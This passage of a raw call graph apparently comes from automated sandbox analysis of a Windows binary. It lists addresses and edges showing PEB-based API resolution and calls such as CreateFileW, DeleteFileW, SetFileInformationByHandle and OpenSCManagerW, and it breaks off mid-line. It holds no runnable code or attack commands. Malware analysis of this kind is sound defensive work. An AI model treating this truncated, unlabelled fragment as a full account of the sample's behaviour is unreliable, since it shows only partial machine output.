4242->4239 4246->4051 4251 c39a1f 4250->4251 4252 c39c42 4251->4252 4255 c39c40 4251->4255 4258 c2c5d8 2 API calls 4251->4258 5020 c2dca0 4251->5020 5024 c43ee9 4251->5024 5034 c23271 4251->5034 4254 c42b09 GetPEB 4252->4254 4254->4255 4255->4051 4258->4251 4261 c38f0d 4259->4261 4262 c38f1d 4261->4262 4263 c2c5d8 2 API calls 4261->4263 4265 c38f3c 4261->4265 5129 c248dd 4261->5129 4264 c30ebc GetPEB 4262->4264 4263->4261 4264->4265 4265->4051 4268 c32b33 4266->4268 4270 c32c60 4268->4270 4271 c3654a GetPEB 4268->4271 4273 c3e1f8 2 API calls 4268->4273 4276 c2a445 3 API calls 4268->4276 4277 c32c5e 4268->4277 4278 c42d0a GetPEB 4268->4278 4279 c3fecb GetPEB 4268->4279 5133 c3dc71 4268->5133 5141 c21ca1 4268->5141 4272 c309dd GetPEB 4270->4272 4271->4268 4274 c32c75 4272->4274 4273->4268 5147 c2856e 4274->5147 4276->4268 4277->4019 4278->4268 4279->4268 4281 c3e211 4280->4281 4306 c2c5d8 4281->4306 4283 c3e2da 4283->4056 4283->4283 4285 c273a9 4284->4285 4286 c2eb52 GetPEB 4285->4286 4287 c2742e 4286->4287 4287->4056 4289 c38bc0 4288->4289 4290 c2eb52 GetPEB 4289->4290 4291 c38c6a 4290->4291 4291->4056 4293 c3fee3 4292->4293 4294 c42b09 GetPEB 4293->4294 4295 c3ff4f 4294->4295 4295->4056 4297 c2f814 4296->4297 4298 c2eb52 GetPEB 4297->4298 4299 c2f892 4298->4299 4299->4064 4301 c42b1f 4300->4301 4302 c428eb GetPEB 4301->4302 4303 c42bd9 4302->4303 4318 c30c2a 4303->4318 4311 c428eb 4306->4311 4310 c2c6b1 4310->4283 4312 c2eb52 GetPEB 4311->4312 4313 c2c69c 4312->4313 4314 c3648a 4313->4314 4315 c364a6 4314->4315 4316 c2eb52 GetPEB 4315->4316 4317 c36539 RtlAllocateHeap 4316->4317 4317->4310 4319 c30c42 4318->4319 4320 c2eb52 GetPEB 4319->4320 4321 c30ce9 4320->4321 4321->4065 4323 c445fd 4322->4323 4324 c2eb52 GetPEB 4323->4324 4325 c446a3 CreateFileW 4324->4325 4325->4071 4327 c3dbe1 4326->4327 4328 c2eb52 GetPEB 4327->4328 4329 c3dc5f 4328->4329 4329->4071 4331 c3ca35 4330->4331 4332 c2eb52 GetPEB 4331->4332 4333 c3cac9 4332->4333 4333->4071 4335 c38c96 4334->4335 4336 c2eb52 GetPEB 4335->4336 4337 c38d2f 4336->4337 4337->4082 4339 c3e10e 4338->4339 4340 c2eb52 GetPEB 4339->4340 4341 c3e19c 4340->4341 4341->4082 4343 c3f859 4342->4343 4344 c3a1c0 GetPEB 4343->4344 4345 c3fb47 4343->4345 4346 c3fb19 4343->4346 4347 c2c5d8 2 API calls 4343->4347 4344->4343 4345->4082 4353 c3a1c0 4346->4353 4347->4343 4350 c254c9 4349->4350 4351 c2eb52 GetPEB 4350->4351 4352 c2555f 4351->4352 4352->4085 4354 c3a1f0 4353->4354 4355 c2eb52 GetPEB 4354->4355 4356 c3a28c 4355->4356 4356->4345 4358 c4451c 4357->4358 4359 c2eb52 GetPEB 4358->4359 4360 c445b7 SetFileInformationByHandle 4359->4360 4360->4095 4362 c2eb52 GetPEB 4361->4362 4363 c255f6 4362->4363 4363->4102 4365 c36564 4364->4365 4366 c3fe2a GetPEB 4365->4366 4367 c36749 4366->4367 4368 c3fe2a GetPEB 4367->4368 4369 c36761 4368->4369 4370 c3fe2a GetPEB 4369->4370 4371 c36774 4370->4371 4385 c2e204 4371->4385 4374 c2e204 GetPEB 4375 c3679e 4374->4375 4389 c2e4f8 4375->4389 4379 c2eb52 GetPEB 4378->4379 4380 c2dc97 4379->4380 4380->4102 4382 c444d8 4381->4382 4383 c431aa GetPEB 4382->4383 4384 c444f7 4383->4384 4384->4102 4386 c2e217 4385->4386 4387 c2eb52 GetPEB 4386->4387 4388 c2e2ae 4387->4388 4388->4374 4390 c2e511 4389->4390 4391 c2eb52 GetPEB 4390->4391 4392 c2e5b5 4391->4392 4392->4106 4401 c3b27f 4393->4401 4394 c3bb76 4396 c42b09 GetPEB 4394->4396 4395 c2c5d8 GetPEB RtlAllocateHeap 4395->4401 4400 c3bb89 4396->4400 4400->4118 4401->4394 4401->4395 4401->4400 4402 c42b09 GetPEB 4401->4402 4404 c2dc1b GetPEB 4401->4404 4405 c23046 GetPEB 4401->4405 4422 c2ee62 4401->4422 4426 c2fa95 4401->4426 4430 c3fd4e 4401->4430 4434 c2c3a7 4401->4434 4402->4401 4404->4401 4405->4401 4407 c2305c 4406->4407 4408 c2eb52 GetPEB 4407->4408 4409 c230db 4408->4409 4409->4118 4411 c37c9b 4410->4411 4412 c2eb52 GetPEB 4411->4412 4413 c37d35 4412->4413 4413->4118 4415 c2f997 4414->4415 4416 c431aa GetPEB 4415->4416 4417 c2f9b9 4416->4417 4417->4118 4419 c3e8d0 4418->4419 4420 c2eb52 GetPEB 4419->4420 4421 c3e946 OpenSCManagerW 4420->4421 4421->4118 4423 c2ee81 4422->4423 4424 c2eb52 GetPEB 4423->4424 4425 c2eefb OpenServiceW 4424->4425 4425->4401 4427 c2fad4 4426->4427 4428 c2eb52 GetPEB 4427->4428 4429 c2fb70 4428->4429 4429->4401 4431 c3fd79 4430->4431 4432 c2eb52 GetPEB 4431->4432 4433 c3fe12 4432->4433 4433->4401 4435 c2c3c9 4434->4435 4436 c2eb52 GetPEB 4435->4436 4437 c2c463 4436->4437 4437->4401 4439 c308fe 4438->4439 4440 c40db1 GetPEB 4439->4440 4441 c309b7 4439->4441 4444 c309b5 4439->4444 4445 c300c5 4439->4445 4440->4439 4442 c2e204 GetPEB 4441->4442 4442->4444 4444->4127 4446 c300d8 4445->4446 4447 c2eb52 GetPEB 4446->4447 4448 c30170 4447->4448 4448->4439 4450 c37a2c 4449->4450 4451 c3e1f8 2 API calls 4450->4451 4452 c37bfe 4451->4452 4459 c32c9c 4452->4459 4455 c3fecb GetPEB 4456 c37c2e 4455->4456 4463 c2d061 4456->4463 4458 c37c45 4458->4141 4460 c32cb8 4459->4460 4461 c431aa GetPEB 4460->4461 4462 c32cd1 4461->4462 4462->4455 4464 c2d07a 4463->4464 4465 c2eb52 GetPEB 4464->4465 4466 c2d141 DeleteFileW 4465->4466 4466->4458 4468 c21eb4 4467->4468 4469 c2eb52 GetPEB 4468->4469 4470 c21f2d 4469->4470 4470->4152 4472 c2bf93 4471->4472 4473 c431aa GetPEB 4472->4473 4474 c2bfb6 4473->4474 4474->4154 4476 c309f3 4475->4476 4477 c2eb52 GetPEB 4476->4477 4478 c30a85 4477->4478 4478->4169 4480 c343a8 4479->4480 4483 c34a52 4480->4483 4485 c34a50 4480->4485 4486 c3e1f8 GetPEB RtlAllocateHeap 4480->4486 4487 c42d0a GetPEB 4480->4487 4488 c32c9c GetPEB 4480->4488 4489 c3fecb GetPEB 4480->4489 4490 c3437a 2 API calls 4480->4490 4491 c32da7 4480->4491 4495 c40f1e 4480->4495 4499 c2bea1 4483->4499 4485->4169 4486->4480 4487->4480 4488->4480 4489->4480 4490->4480 4492 c32dbd 4491->4492 4493 c2eb52 GetPEB 4492->4493 4494 c32e4f 4493->4494 4494->4480 4496 c40f37 4495->4496 4497 c2eb52 GetPEB 4496->4497 4498 c40ff6 4497->4498 4498->4480 4500 c2beb1 4499->4500 4501 c2eb52 GetPEB 4500->4501 4502 c2bf53 4501->4502 4502->4485 4504 c41631 4503->4504 4505 c2eb52 GetPEB 4504->4505 4506 c416b5 4505->4506 4506->4184 4508 c42a49 4507->4508 4509 c2eb52 GetPEB 4508->4509 4510 c42afe 4509->4510 4510->4184 4516 c26b9c 4511->4516 4512 c42b09 GetPEB 4512->4516 4514 c2706b 4514->4198 4516->4512 4516->4514 4517 c2c5d8 2 API calls 4516->4517 4576 c407aa 4516->4576 4581 c3c9b0 4516->4581 4585 c446bd 4516->4585 4517->4516 4530 c357ab 4519->4530 4521 c42b09 GetPEB 4521->4530 4522 c36086 4524 c42b09 GetPEB 4522->4524 4523 c257b8 2 API calls 4523->4530 4526 c36084 4524->4526 4526->4198 4528 c3c9b0 GetPEB 4528->4530 4529 c2c5d8 2 API calls 4529->4530 4530->4521 4530->4522 4530->4523 4530->4526 4530->4528 4530->4529 4634 c25026 4530->4634 4638 c2e7de 4530->4638 4643 c2fb8e 4530->4643 4539 c283f1 4531->4539 4532 c3e1f8 2 API calls 4532->4539 4533 c2854c 4534 c42b09 GetPEB 4533->4534 4536 c2854a 4534->4536 4536->4198 4537 c431aa GetPEB 4537->4539 4538 c2c5d8 2 API calls 4538->4539 4539->4532 4539->4533 4539->4536 4539->4537 4539->4538 4540 c3fecb GetPEB 4539->4540 4650 c40a64 4539->4650 4540->4539 4554 c3393f 4541->4554 4542 c34244 2 API calls 4542->4554 4543 c2c5d8 GetPEB RtlAllocateHeap 4543->4554 4545 c3c9b0 GetPEB 4545->4554 4546 c42b09 GetPEB 4547 c33a00 4546->4547 4547->4198 4548 c3e1f8 2 API calls 4548->4554 4549 c33d59 4549->4546 4550 c33992 4655 c34244 4550->4655 4552 c431aa GetPEB 4552->4554 4554->4542 4554->4543 4554->4545 4554->4547 4554->4548 4554->4549 4554->4550 4554->4552 4558 c3fecb GetPEB 4554->4558 4663 c3e1ac 4554->4663 4557 c3fecb GetPEB 4557->4547 4558->4554 4575 c36859 4559->4575 4562 c3e1f8 2 API calls 4562->4575 4563 c3792e 4699 c3e358 4563->4699 4567 c37943 4567->4198 4568 c3e358 GetPEB 4568->4575 4569 c42b09 GetPEB 4569->4575 4570 c3fecb GetPEB 4570->4575 4573 c43e0e GetPEB 4573->4575 4575->4562 4575->4563 4575->4567 4575->4568 4575->4569 4575->4570 4575->4573 4667 c2ed66 4575->4667 4671 c2dda9 4575->4671 4675 c24bfc 4575->4675 4684 c410dc 4575->4684 4688 c2ef0c 4575->4688 4691 c24a88 4575->4691 4695 c3c8cf 4575->4695 4577 c407c6 4576->4577 4580 c40a10 4577->4580 4591 c257b8 4577->4591 4606 c44d53 4577->4606 4580->4516 4582 c3c9cc 4581->4582 4630 c2db68 4582->4630 4588 c446ed 4585->4588 4586 c42b09 GetPEB 4586->4588 4587 c2c5d8 2 API calls 4587->4588 4588->4586 4588->4587 4589 c411b0 GetPEB 4588->4589 4590 c44d2e 4588->4590 4589->4588 4590->4516 4597 c257fa 4591->4597 4593 c3e1f8 GetPEB RtlAllocateHeap 4593->4597 4594 c2c5d8 2 API calls 4594->4597 4596 c266de 4598 c2f7fe GetPEB 4596->4598 4597->4593 4597->4594 4597->4596 4599 c266dc 4597->4599 4601 c2738a GetPEB 4597->4601 4602 c42b09 GetPEB 4597->4602 4605 c3fecb GetPEB 4597->4605 4610 c3cbe9 4597->4610 4614 c222c9 4597->4614 4618 c21bc9 4597->4618 4622 c2f288 4597->4622 4626 c412c1 4597->4626 4598->4599 4599->4577 4601->4597 4602->4597 4605->4597 4607 c44d85 4606->4607 4608 c2eb52 GetPEB 4607->4608 4609 c44e23 4608->4609 4609->4577 4611 c3cc0e 4610->4611 4612 c2eb52 GetPEB 4611->4612 4613 c3cc8d 4612->4613 4613->4597 4615 c222e8 4614->4615 4616 c2eb52 GetPEB 4615->4616 4617 c22377 4616->4617 4617->4597 4619 c21bfb 4618->4619 4620 c2eb52 GetPEB 4619->4620 4621 c21c85 4620->4621 4621->4597 4623 c2f2b2 4622->4623 4624 c2eb52 GetPEB 4623->4624 4625 c2f350 4624->4625 4625->4597 4627 c412da 4626->4627 4628 c2eb52 GetPEB 4627->4628 4629 c41380 4628->4629 4629->4597 4631 c2db84 4630->4631 4632 c2eb52 GetPEB 4631->4632 4633 c2dc0b 4632->4633 4633->4516 4635 c2503c 4634->4635 4636 c3c9b0 GetPEB 4635->4636 4637 c250e1 4636->4637 4637->4530 4642 c2e806 4638->4642 4639 c3cad5 GetPEB 4639->4642 4640 c2c5d8 2 API calls 4640->4642 4641 c2eb40 4641->4530 4642->4639 4642->4640 4642->4641 4645 c2fbad 4643->4645 4644 c22194 GetPEB 4644->4645 4645->4644 4646 c2c5d8 2 API calls 4645->4646 4647 c30086 4645->4647 4649 c30084 4645->4649 4646->4645 4648 c42b09 GetPEB 4647->4648 4648->4649 4649->4530 4652 c40a7e 4650->4652 4651 c3c4f8 GetPEB 4651->4652 4652->4651 4653 c2c5d8 2 API calls 4652->4653 4654 c40da7 4652->4654 4653->4652 4654->4539 4656 c3425e 4655->4656 4657 c2c5d8 2 API calls 4656->4657 4658 c339af 4657->4658 4659 c23325 4658->4659 4660 c2333e 4659->4660 4661 c431aa GetPEB 4660->4661 4662 c2335a 4661->4662 4662->4557 4664 c3e1ce 4663->4664 4665 c431aa GetPEB 4664->4665 4666 c3e1f0 4665->4666 4666->4554 4668 c2eda1 4667->4668 4669 c2eb52 GetPEB 4668->4669 4670 c2ee49 4669->4670 4670->4575 4672 c2ddcb 4671->4672 4673 c2eb52 GetPEB 4672->4673 4674 c2de63 4673->4674 4674->4575 4677 c24ec7 4675->4677 4678 c2c5d8 GetPEB RtlAllocateHeap 4677->4678 4679 c24fee 4677->4679 4682 c3c9b0 GetPEB 4677->4682 4683 c42b09 GetPEB 4677->4683 4703 c39c65 4677->4703 4678->4677 4680 c25009 4679->4680 4681 c42b09 GetPEB 4679->4681 4680->4575 4681->4680 4682->4677 4683->4677 4685 c41100 4684->4685 4686 c2eb52 GetPEB 4685->4686 4687 c4119a 4686->4687 4687->4575 4707 c360b8 4688->4707 4692 c24abc 4691->4692 4693 c2eb52 GetPEB 4692->4693 4694 c24b44 4693->4694 4694->4575 4696 c3c8f4 4695->4696 4697 c2eb52 GetPEB 4696->4697 4698 c3c99d 4697->4698 4698->4575 4700 c3e36b 4699->4700 4701 c2eb52 GetPEB 4700->4701 4702 c3e3fa 4701->4702 4702->4567 4704 c39c85 4703->4704 4705 c2eb52 GetPEB 4704->4705 4706 c39d29 4705->4706 4706->4677 4708 c360de 4707->4708 4709 c2eb52 GetPEB 4708->4709 4710 c2efd1 4709->4710 4710->4575 4722 c21f38 4711->4722 4715 c30ade 4714->4715 4745 c3f790 4715->4745 4718 c30c1f 4718->4205 4721 c41538 2 API calls 4721->4718 4724 c21f57 4722->4724 4727 c220cc 4724->4727 4729 c220da 4724->4729 4731 c27603 4724->4731 4734 c406ec 4724->4734 4738 c2bd23 4724->4738 4742 c2e5c0 4724->4742 4730 c41538 2 API calls 4727->4730 4729->4205 4730->4729 4732 c2eb52 GetPEB 4731->4732 4733 c276d3 4732->4733 4733->4724 4735 c40702 4734->4735 4736 c2eb52 GetPEB 4735->4736 4737 c4079c 4736->4737 4737->4724 4739 c2bd40 4738->4739 4740 c2eb52 GetPEB 4739->4740 4741 c2bdeb 4740->4741 4741->4724 4743 c2556b GetPEB 4742->4743 4744 c2e625 4743->4744 4744->4724 4746 c2eb52 GetPEB 4745->4746 4747 c30bf0 4746->4747 4747->4718 4748 c2daaa 4747->4748 4749 c2dac8 4748->4749 4750 c2eb52 GetPEB 4749->4750 4751 c2db55 4750->4751 4751->4721 4753 c253e3 4752->4753 4754 c2eb52 GetPEB 4753->4754 4755 c2546b 4754->4755 4755->4051 4757 c32d03 4756->4757 4758 c2eb52 GetPEB 4757->4758 4759 c32d8e 4758->4759 4759->4219 4761 c22e23 4760->4761 4762 c2eb52 GetPEB 4761->4762 4763 c22ea5 4762->4763 4763->4219 4768 c39e1d 4764->4768 4765 c34244 2 API calls 4765->4768 4768->4765 4769 c3a1b5 4768->4769 4771 c3fecb GetPEB 4768->4771 4772 c396c2 4768->4772 4776 c35515 4768->4776 4781 c40a1a 4768->4781 4769->4229 4771->4768 4773 c396db 4772->4773 4774 c2eb52 GetPEB 4773->4774 4775 c39765 4774->4775 4775->4768 4785 c30de5 4776->4785 4778 c35670 4778->4768 4782 c40a3f 4781->4782 4783 c431aa GetPEB 4782->4783 4784 c40a5c 4783->4784 4784->4768 4786 c30dfe 4785->4786 4787 c2eb52 GetPEB 4786->4787 4788 c30eae 4787->4788 4788->4778 4789 c4138b 4788->4789 4790 c413b8 4789->4790 4791 c2eb52 GetPEB 4790->4791 4792 c41475 4791->4792 4792->4778 4794 c3b1af 4793->4794 4795 c2eb52 GetPEB 4794->4795 4796 c3b248 4795->4796 4796->4051 4814 c383d6 4797->4814 4798 c3851b 4799 c21a34 GetPEB 4798->4799 4800 c3854b 4799->4800 4802 c3e1f8 2 API calls 4800->4802 4801 c40db1 GetPEB 4801->4814 4803 c38565 4802->4803 4805 c42d0a GetPEB 4803->4805 4804 c309dd GetPEB 4804->4814 4807 c385a6 4805->4807 4808 c3fecb GetPEB 4807->4808 4810 c385c6 4808->4810 4809 c3e1f8 2 API calls 4809->4814 4811 c385ff 3 API calls 4810->4811 4813 c38516 4811->4813 4812 c42d0a GetPEB 4812->4814 4813->4239 4814->4798 4814->4801 4814->4804 4814->4809 4814->4812 4814->4813 4815 c3fecb GetPEB 4814->4815 4915 c2baa9 4814->4915 4919 c2bfbe 4814->4919 4815->4814 4824 c404c6 4817->4824 4818 c405e9 4820 c385ff 3 API calls 4818->4820 4819 c405e7 4819->4239 4820->4819 4821 c40db1 GetPEB 4821->4824 4822 c309dd GetPEB 4822->4824 4823 c2baa9 GetPEB 4823->4824 4824->4818 4824->4819 4824->4821 4824->4822 4824->4823 4825 c3e1f8 2 API calls 4824->4825 4826 c42d0a GetPEB 4824->4826 4827 c3fecb GetPEB 4824->4827 4828 c2bfbe 3 API calls 4824->4828 4825->4824 4826->4824 4827->4824 4828->4824 4830 c2ba26 4829->4830 4831 c2ba9c 4830->4831 4832 c42b09 GetPEB 4830->4832 4833 c41028 GetPEB 4830->4833 4835 c41538 2 API calls 4830->4835 4930 c2f0e9 4830->4930 4831->4239 4832->4830 4833->4830 4835->4830 4938 c41f6d 4836->4938 4838 c42b09 GetPEB 4843 c2b3e7 4838->4843 4839 c40a64 2 API calls 4839->4843 4841 c3e1f8 GetPEB RtlAllocateHeap 4841->4843 4842 c21a34 GetPEB 4842->4843 4843->4838 4843->4839 4843->4841 4843->4842 4844 c385ff 3 API calls 4843->4844 4845 c2b7fb 4843->4845 4846 c444ad GetPEB 4843->4846 4847 c2b7fd 4843->4847 4848 c40db1 GetPEB 4843->4848 4850 c3fecb GetPEB 4843->4850 4851 c309dd GetPEB 4843->4851 4852 c300c5 GetPEB 4843->4852 4853 c2baa9 GetPEB 4843->4853 4855 c42d0a GetPEB 4843->4855 4856 c2bfbe 3 API calls 4843->4856 4941 c2f726 4843->4941 4945 c3d8db 4843->4945 4844->4843 4845->4239 4846->4843 4849 c41538 2 API calls 4847->4849 4848->4843 4849->4845 4850->4843 4851->4843 4852->4843 4853->4843 4855->4843 4856->4843 4858 c3cfe9 4857->4858 4860 c3d0f3 4858->4860 4862 c3d073 GetCursorFrameInfo 4858->4862 4864 c3d0f1 4858->4864 4955 c30ebc 4858->4955 4959 c43263 4858->4959 4861 c2f0e9 GetPEB 4860->4861 4861->4864 4967 c2e2bd 4862->4967 4864->4239 4869 c22ad8 4866->4869 4867 c3c387 GetPEB 4867->4869 4868 c22d78 4870 c385ff 3 API calls 4868->4870 4869->4867 4869->4868 4876 c22d62 4869->4876 4877 c40db1 GetPEB 4869->4877 4878 c22d64 4869->4878 4880 c309dd GetPEB 4869->4880 4881 c41538 GetPEB FindCloseChangeNotification 4869->4881 4882 c2baa9 GetPEB 4869->4882 4883 c3e1f8 2 API calls 4869->4883 4884 c42d0a GetPEB 4869->4884 4885 c3fecb GetPEB 4869->4885 4886 c2bfbe 3 API calls 4869->4886 4980 c39774 4869->4980 4988 c3017b 4869->4988 4997 c3bc6b 4869->4997 4872 c22da8 4870->4872 4875 c41538 2 API calls 4872->4875 4872->4876 4874 c41538 2 API calls 4874->4876 4875->4878 4876->4239 4877->4869 4878->4874 4880->4869 4881->4869 4882->4869 4883->4869 4884->4869 4885->4869 4886->4869 4906 c3aadf 4887->4906 4888 c3ac24 4890 c21a34 GetPEB 4888->4890 4889 c3ac1f 4889->4239 4892 c3ac51 4890->4892 4891 c40db1 GetPEB 4891->4906 4893 c3e1f8 2 API calls 4892->4893 4895 c3ac74 4893->4895 4894 c309dd GetPEB 4894->4906 4896 c42d0a GetPEB 4895->4896 4898 c3acaf 4896->4898 4897 c2baa9 GetPEB 4897->4906 4899 c3fecb GetPEB 4898->4899 4901 c3accf 4899->4901 4900 c3e1f8 2 API calls 4900->4906 4902 c385ff 3 API calls 4901->4902 4902->4889 4903 c42d0a GetPEB 4903->4906 4904 c3fecb GetPEB 4904->4906 4905 c2bfbe 3 API calls 4905->4906 4906->4888 4906->4889 4906->4891 4906->4894 4906->4897 4906->4900 4906->4903 4906->4904 4906->4905 4913 c4307f 4907->4913 4908 c4318a 4908->4239 4909 c4318c 4911 c2f0e9 GetPEB 4909->4911 4910 c43263 GetPEB 4910->4913 4911->4908 4912 c30ebc GetPEB 4912->4913 4913->4908 4913->4909 4913->4910 4913->4912 4914 c2e2bd GetPEB 4913->4914 4914->4913 4916 c2bac2 4915->4916 4917 c2dc1b GetPEB 4916->4917 4918 c2bb97 4917->4918 4918->4814 4923 c2bfd7 4919->4923 4920 c2c273 4922 c41538 2 API calls 4920->4922 4921 c445ca 2 API calls 4921->4923 4924 c2c271 4922->4924 4923->4920 4923->4921 4923->4924 4926 c3c41a 4923->4926 4924->4814 4927 c3c440 4926->4927 4928 c2eb52 GetPEB 4927->4928 4929 c3c4e1 4928->4929 4929->4923 4931 c2f0ff 4930->4931 4934 c2f8a9 4931->4934 4935 c2f8c6 4934->4935 4936 c2eb52 GetPEB 4935->4936 4937 c2f1c3 4936->4937 4937->4830 4939 c2eb52 GetPEB 4938->4939 4940 c42000 4939->4940 4940->4843 4942 c2f758 4941->4942 4943 c2eb52 GetPEB 4942->4943 4944 c2f7dc 4943->4944 4944->4843 4950 c3d8fb 4945->4950 4946 c2c5d8 2 API calls 4946->4950 4947 c3db95 4951 c3cad5 4947->4951 4948 c3db93 4948->4843 4950->4946 4950->4947 4950->4948 4952 c3caef 4951->4952 4953 c3c9b0 GetPEB 4952->4953 4954 c3cbda 4953->4954 4954->4948 4956 c30ede 4955->4956 4957 c2eb52 GetPEB 4956->4957 4958 c30f72 4957->4958 4958->4858 4960 c4327e 4959->4960 4961 c43556 4960->4961 4972 c362c7 4960->4972 4961->4858 4964 c3c9b0 GetPEB 4965 c4350d 4964->4965 4965->4961 4966 c3c9b0 GetPEB 4965->4966 4966->4965 4970 c2e2d8 4967->4970 4968 c2e3f5 4968->4858 4969 c2483c GetPEB 4969->4970 4970->4968 4970->4969 4976 c21afd 4970->4976 4973 c362eb 4972->4973 4974 c2eb52 GetPEB 4973->4974 4975 c36383 4974->4975 4975->4961 4975->4964 4977 c21b10 4976->4977 4978 c2eb52 GetPEB 4977->4978 4979 c21bba 4978->4979 4979->4970 4982 c39797 4980->4982 4983 c3bc6b GetPEB 4982->4983 4985 c39956 4982->4985 4987 c39967 4982->4987 5000 c272c4 4982->5000 5004 c2f9c1 4982->5004 4983->4982 4986 c41538 2 API calls 4985->4986 4986->4987 4987->4869 4990 c301c2 4988->4990 4992 c3fe2a GetPEB 4990->4992 4993 c306f1 4990->4993 4994 c3e1f8 2 API calls 4990->4994 4996 c3fecb GetPEB 4990->4996 5008 c2473d 4990->5008 5012 c34178 4990->5012 5016 c37952 4990->5016 4992->4990 4993->4869 4994->4990 4996->4990 4998 c2eb52 GetPEB 4997->4998 4999 c3bd0a 4998->4999 4999->4869 5001 c272e0 5000->5001 5002 c2eb52 GetPEB 5001->5002 5003 c2737c 5002->5003 5003->4982 5005 c2f9eb 5004->5005 5006 c2eb52 GetPEB 5005->5006 5007 c2fa7c 5006->5007 5007->4982 5009 c24786 5008->5009 5010 c2eb52 GetPEB 5009->5010 5011 c2481a 5010->5011 5011->4990 5013 c34194 5012->5013 5014 c2eb52 GetPEB 5013->5014 5015 c34233 5014->5015 5015->4990 5017 c37965 5016->5017 5018 c2eb52 GetPEB 5017->5018 5019 c37a04 5018->5019 5019->4990 5021 c2dd30 5020->5021 5022 c2dd16 5020->5022 5021->4251 5022->5021 5023 c42b09 GetPEB 5022->5023 5023->5022 5029 c441ee 5024->5029 5025 c443c9 5025->4251 5026 c3e1f8 2 API calls 5026->5029 5028 c2f96f GetPEB 5028->5029 5029->5025 5029->5026 5029->5028 5030 c443b4 5029->5030 5032 c3fecb GetPEB 5029->5032 5033 c2c5d8 2 API calls 5029->5033 5038 c33d85 5029->5038 5031 c42b09 GetPEB 5030->5031 5031->5025 5032->5029 5033->5029 5035 c2328d 5034->5035 5042 c27442 5035->5042 5039 c33d9c 5038->5039 5040 c2c5d8 2 API calls 5039->5040 5041 c33e5b 5040->5041 5041->5029 5041->5041 5045 c27462 5042->5045 5043 c2c5d8 2 API calls 5043->5045 5045->5043 5047 c27576 5045->5047 5050 c2331d 5045->5050 5051 c38fae 5045->5051 5060 c30d04 5045->5060 5065 c30f86 5045->5065 5049 c42b09 GetPEB 5047->5049 5049->5050 5050->4251 5059 c394f3 5051->5059 5052 c3969b 5053 c2f7fe GetPEB 5052->5053 5054 c39699 5053->5054 5054->5045 5055 c3e1f8 GetPEB RtlAllocateHeap 5055->5059 5057 c2738a GetPEB 5057->5059 5058 c3fecb GetPEB 5058->5059 5059->5052 5059->5054 5059->5055 5059->5057 5059->5058 5082 c2bc32 5059->5082 5086 c22ebf 5060->5086 5063 c42b09 GetPEB 5064 c30dde 5063->5064 5064->5045 5066 c31c7c 5065->5066 5067 c3c237 GetPEB 5066->5067 5068 c3e1f8 GetPEB RtlAllocateHeap 5066->5068 5070 c22ebf GetPEB 5066->5070 5071 c2bc32 GetPEB 5066->5071 5072 c32118 5066->5072 5075 c3fecb GetPEB 5066->5075 5076 c32116 5066->5076 5080 c2738a GetPEB 5066->5080 5081 c3c9b0 GetPEB 5066->5081 5090 c23431 5066->5090 5105 c416c0 5066->5105 5109 c3c2cf 5066->5109 5113 c443e6 5066->5113 5117 c251e7 5066->5117 5067->5066 5068->5066 5070->5066 5071->5066 5077 c2f7fe GetPEB 5072->5077 5075->5066 5076->5045 5077->5076 5080->5066 5081->5066 5083 c2bc62 5082->5083 5084 c2eb52 GetPEB 5083->5084 5085 c2bd08 5084->5085 5085->5059 5087 c22ed3 5086->5087 5088 c2eb52 GetPEB 5087->5088 5089 c22f74 5088->5089 5089->5063 5091 c24267 5090->5091 5092 c42b09 GetPEB 5091->5092 5093 c24738 5091->5093 5094 c3e1f8 GetPEB RtlAllocateHeap 5091->5094 5095 c242a0 5091->5095 5096 c2f288 GetPEB 5091->5096 5097 c2c5d8 2 API calls 5091->5097 5098 c300c5 GetPEB 5091->5098 5102 c2738a GetPEB 5091->5102 5104 c3fecb GetPEB 5091->5104 5121 c250e8 5091->5121 5125 c249a4 5091->5125 5092->5091 5093->5093 5094->5091 5099 c2f7fe GetPEB 5095->5099 5096->5091 5097->5091 5098->5091 5101 c242be 5099->5101 5101->5066 5102->5091 5104->5091 5106 c416f5 5105->5106 5107 c2eb52 GetPEB 5106->5107 5108 c417a1 5107->5108 5108->5066 5110 c3c2e5 5109->5110 5111 c2eb52 GetPEB 5110->5111 5112 c3c370 5111->5112 5112->5066 5114 c44405 5113->5114 5115 c2eb52 GetPEB 5114->5115 5116 c44498 5115->5116 5116->5066 5118 c25206 5117->5118 5119 c2eb52 GetPEB 5118->5119 5120 c252a5 5119->5120 5120->5066 5122 c25123 5121->5122 5123 c2eb52 GetPEB 5122->5123 5124 c251c6 5123->5124 5124->5091 5126 c249d5 5125->5126 5127 c2eb52 GetPEB 5126->5127 5128 c24a6b 5127->5128 5128->5091 5130 c248f4 5129->5130 5131 c2eb52 GetPEB 5130->5131 5132 c24996 5131->5132 5132->4261 5136 c3dfa2 5133->5136 5134 c253d0 GetPEB 5134->5136 5136->5134 5137 c3e1f8 2 API calls 5136->5137 5138 c3e0e6 5136->5138 5139 c22dea GetPEB 5136->5139 5140 c3fecb GetPEB 5136->5140 5151 c4298d 5136->5151 5137->5136 5138->4268 5139->5136 5140->5136 5143 c21cc0 5141->5143 5144 c3fe2a GetPEB 5143->5144 5146 c21e90 5143->5146 5155 c22f80 5143->5155 5159 c306fe 5143->5159 5144->5143 5146->4268 5148 c28581 5147->5148 5149 c2eb52 GetPEB 5148->5149 5150 c2862b 5149->5150 5150->4277 5152 c429a3 5151->5152 5153 c2eb52 GetPEB 5152->5153 5154 c42a27 5153->5154 5154->5136 5156 c22f9f 5155->5156 5157 c2eb52 GetPEB 5156->5157 5158 c23039 5157->5158 5158->5143 5160 c3071c 5159->5160 5161 c2eb52 GetPEB 5160->5161 5162 c307dc 5161->5162 5162->5143 5179 c219eb 5180 c219b1 5179->5180 5180->5179 5181 c2eb52 GetPEB 5180->5181 5182 c21aeb 5181->5182 5183 c436aa 5184 c43bc2 5183->5184 5185 c2c5d8 2 API calls 5184->5185 5186 c42b09 GetPEB 5184->5186 5187 c43df0 5184->5187 5188 c40db1 GetPEB 5184->5188 5190 c309dd GetPEB 5184->5190 5191 c43dee 5184->5191 5193 c445ca 2 API calls 5184->5193 5194 c4061d 2 API calls 5184->5194 5196 c3e406 5184->5196 5200 c427bc 5184->5200 5185->5184 5186->5184 5189 c41538 2 API calls 5187->5189 5188->5184 5189->5191 5190->5184 5193->5184 5194->5184 5197 c3e434 5196->5197 5198 c2eb52 GetPEB 5197->5198 5199 c3e4c9 5198->5199 5199->5184 5201 c427cf 5200->5201 5202 c2eb52 GetPEB 5201->5202 5203 c42873 5202->5203 5203->5184 5204 c3befd 5205 c309dd GetPEB 5204->5205 5206 c3c1a1 5205->5206 5207 c4061d 2 API calls 5206->5207 5208 